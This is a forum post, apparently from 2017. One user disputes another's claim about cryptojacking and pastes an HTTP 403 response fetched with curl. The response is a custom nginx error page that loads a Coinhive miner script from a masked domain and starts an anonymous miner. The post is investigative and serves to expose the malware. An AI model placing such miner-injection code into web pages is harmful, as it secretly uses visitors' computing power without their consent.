Quote:
Originally Posted by Bladewire
You are trippin
Cryptojacking is when a webpage loads a mining javascript. Norton is flagging any elements from that domain. The image is not loading a script.
Anyway, it's good people know to stay away �� Thank you ��
|
Dude. I have been tracking down viruses and malware for about 30 years now.
You are the one doing the tripping.
I hit the image url with a curl call using a referal of gfy.com and the following code comes back.
The page returns a 403 and then attempts to load a script through a custom 403 page.
Code:
HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 29 Dec 2017 13:33:30 GMT
Content-Type: text/html
Content-Length: 378
Connection: keep-alive ETag: "5a09c6d9-17a"
<html>
<head>
<title>403 Forbidden</title>
</head>
<body bgcolor="white">
<center>
<h1>403 Forbidden</h1>
</center>
<hr>
<center>nginx</center>
<script src="https://xxxxxxxxxx.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('');
miner.start();
</script>
<script src="http://www.google.com:81/"></script>
</body> </html>
.